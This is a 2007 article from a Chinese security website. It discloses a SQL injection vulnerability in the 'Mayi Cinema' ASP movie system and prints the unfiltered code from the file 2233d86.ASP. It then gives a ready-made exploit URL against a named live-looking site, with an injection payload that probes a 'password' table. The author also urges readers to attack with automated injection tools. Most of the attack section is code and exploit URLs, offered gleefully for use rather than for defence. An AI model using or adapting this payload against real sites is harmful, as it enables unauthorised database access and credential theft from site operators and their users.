| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 安全技术首页 | 技术研究 | 技术应用 | 数据安全 | 企业专区 |
再暴蚂蚁影院系统的注射漏洞
再暴蚂蚁影院系统的注射漏洞
作者:未知 文章来源:安全中国 点击数: 更新时间:2007-9-10 1:33:14

为了看电影今天坐上床上乖乖的看代码,看了两个文件,两个文件都有注射漏洞,第一个cookie注射漏洞,接下来的这个就比较好利用了,直接拿工具注射吧,嘿嘿.

老规矩先来分析一下代码,漏洞是在2233d86.ASP文件里,重要代码:
<% Response.Expires=0
dim sql
dim rs
articleid=request("film2") //看到request就知道代码编写者白痴,
urlid=request("film1")
if articleid="" or urlid="" then
response.write"非法操作"
response.end
end if
set rs=server.createobject("adodb.recordset")
sql="select serverip,canlook,movietype,title from learning where articleid="&articleid
rs.open sql,conn,1,1
serverip=rs("serverip")
okip=Request.Servervariables("HTTP_X_FORWARDED_FOR")
If okip="" Then okip=Request.Servervariables("REMOTE_ADDR")
set rst8=server.createobject("adodb.recordset")
sql="select okip,testok,endtimes from okip where okip='"&okip&"'"
rst8.open sql,conn,1,1
if rst8.eof and rst8.bof then
if request.cookies("userid")="" or request.cookies("password")="" then
%>
看到了吧,articleid=request("film2"), urlid=request("film1"),用ctrl+f追踪这两个变量,根本没有看到过滤,嘿嘿,这下爽了吧,直接注吧.

直接构造如下:
http://www.yubei.cq.cn/mov/2233d86.asp?film1=2524&film2=421
保证film1和film2不为空就可以了,两个都没过滤都可以注射,交换变量位置也一样.

构造注射语句如下:
http://www.yubei.cq.cn/mov/2233d86.asp?film1=2524&film2=421 and 1=(select count(*) from password);--
嘿嘿,接下来的就不要我教了吧

文章录入:郝丽    责任编辑:郝丽 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    巧妙利用系统控制台删除
    不只系统崩溃 病毒破坏硬
    系统DLL技术助力木马静态
    消防无线监控系统解决方
    简单的入侵他人系统
    Johnson Matthey公司的邮
    北京市东直门中学校园网
    宁波港集团网管系统运用
    赛门误删微软系统文件 系
    六项措施“急救”受损Wi
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有